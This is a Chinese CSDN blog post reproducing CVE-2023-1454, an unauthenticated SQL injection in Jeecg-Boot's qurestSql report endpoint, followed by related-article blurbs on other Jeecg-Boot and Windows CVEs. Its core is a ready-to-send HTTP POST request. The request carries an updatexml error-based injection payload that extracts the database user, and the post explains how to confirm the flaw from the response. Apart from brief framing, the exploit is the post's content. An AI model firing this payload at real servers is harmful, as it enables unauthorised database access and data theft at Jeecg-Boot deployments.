CVE-2023-1454 Jeecg-Boot-qurestSql-SQL-漏洞检测

最新推荐文章于 2024-05-14 10:18:34 发布
最新推荐文章于 2024-05-14 10:18:34 发布
阅读量1.3k 收藏 1
点赞数
文章标签: sql 网络安全 web安全 笔记 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66376444/article/details/130093399
版权
JeecgBoot,一个基于BPM的低代码平台,被发现其qurestSql组件存在SQL注入漏洞,允许攻击者获取数据库权限。攻击者可以通过修改GET请求为POST请求并发送特定payload来利用此漏洞。复现过程中,当收到含有payload的POST请求时,表明系统存在漏洞。
摘要由CSDN通过智能技术生成

一、漏洞信息

JeecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞,攻击者可以从其中获取数据库权限。

二、漏洞复现

访问路径:/jeecg-boot/jmreport/qurestSql

 

 初步了解,存在这个路径可能会存在sql漏洞

抓包把get请求改为post请求:

发送payload

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Type: application/json;charset=UTF-8Content-Length: 130

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

出现这个说明存在漏洞。

 

 

 

 

wudidaniuniu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
漏洞复现】Jeecg-Boot SQL注入漏洞(CVE-2023-34659)
失心少年
09-26 782
强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!
JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 2170
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
cve-2023-1454
04-24
漏洞描述: JeecgBoot是一款基于代码生成器的低代码开发平台。 企业Web应用程序的Java低代码平台JEECG-Boot(v3.5.0)最新未经授权的SQL注入。 影响范围: 攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现】Jeecg-boot SQL注入/命令执行
最新发布
qq_45276174的博客
05-14 636
【代码】【漏洞复现】Jeecg-boot SQL注入/命令执行。
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
fly夏天的博客
03-20 3338
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
记一次edu站点并拿下的过程cnvd
zkaqlaoniao的博客
10-18 156
JeecgBoot是一款基于代码生成器的低代码开发平台,零代码开发!采用前后端分离架构:SpringBoot2.x,Ant Design&Vue,Mybatis-plus,Shiro,JWT。JeecgBoot引领新的开发模式 (Online Coding模式-> 代码生成器模式-> 手工MERGE智能开发),帮助解决Java项目70%的重复工作,让开发更多关注业务逻辑。一开始想着去复现一下CVE-2023-1454(jeecg-boot)的SQL注入的,结果意外打野发现了edu站点。
Jeecg-Boot 存在前台SQL注入漏洞CVE-2023-1454
holyxp的博客
07-02 4680
eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!
Goby漏洞更新 | jeecg-boot 未授权SQL注入漏洞CVE-2023-1454
m0_46699477的博客
03-24 1938
jeecg-boot 未授权SQL注入漏洞CVE-2023-1454
CVE-2023-1454Jeecg-Boot SQL注入漏洞复现
薛定谔嘚喵博客
09-15 1132
JeecgBoot 受影响版本中由于积木报表 /jeecg-boot/jmreport/queryFieldBySql Api 接口未进行身份校验,使用 Freemarker 处理用户用户传入的 sql 参数,未经授权的攻击者可发送包含恶意 sql 参数的 http 请求,通过 SSTI 在应用端执行任意代码。
Jeecg-Boot /jeecg-boot/jmreport/qurestSql接口sql注入漏洞复现
weixin_45908624的博客
09-11 2870
JeecgBoot 前台接口SQL注入漏洞
漏洞分析|jeecg-boot 未授权SQL注入漏洞CVE-2023-1454
xuandaoren的博客
12-31 2913
jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了对sql语句的正则。JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。更改了72处的文件,其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql中重写了数据插入的方法。建议更新当前系统或软件至最新版,完成漏洞的修复。
JEECGBOOT代码SQL漏洞处理方案.zip
06-21
漏洞编码:HW21-0499 产品名字:JeecgBoot低代码平台 问题: JEECG系统存在SQL注入0day漏洞
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
08-23
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。 卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———...
Jeecg-Boot未授权SQL注入CVE-2023-1454
2301_81907423的博客
12-29 375
Win64;
CVE-2023-1454注入分析复现
蚁景网安学院
07-17 1858
JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。
Goby漏洞更新 jeecg-boot 未授权SQL注入漏洞CVE-2024-1454
2301_77033672的博客
04-17 338
攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!企业Web应用程序的Java低代码平台JEECG-Boot(v3.5.0)最新未经授权的SQL注入。JeecgBoot是一款基于代码生成器的低代码开发平台。
cve-2023-44313漏洞
02-03
CVE-2023-44313是一个安全漏洞,其涉及到某个特定软件或系统的代码中存在的问题。该漏洞可能导致攻击者利用该软件或系统的弱点,来执行恶意代码或获取未授权的访问权限。 对于CVE-2023-44313漏洞,它可能具有多种不同的影响。例如,攻击者可能能够通过利用该漏洞,绕过身份验证机制并访问系统中的敏感数据。此外,他们还可以执行未经授权的命令,使系统陷入不稳定状态,甚至导致系统崩溃。 为了解决CVE-2023-44313漏洞,软件或系统的开发者通常会发布一个安全更新或补丁程序。这个补丁会修复软件或系统中存在的漏洞,加强安全性并防止攻击者利用该漏洞。因此,作为用户,我们应该及时安装这些更新或补丁,以确保自己的系统免受该漏洞的影响。 此外,我们还可以采取其他一些措施来防止CVE-2023-44313漏洞的利用。例如,我们应该确保使用的软件和系统是最新版本,因为较旧的版本可能会存在已知的漏洞。此外,保持杀毒软件和防火墙的最新更新也是很重要的,因为它们可以帮助我们检测和阻止潜在的恶意活动。 总之,CVE-2023-44313漏洞是一个需要引起关注并及时处理的安全漏洞。通过安装最新的安全更新和补丁,以及保持软件和系统的最新版本,我们可以显著降低受到该漏洞攻击的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值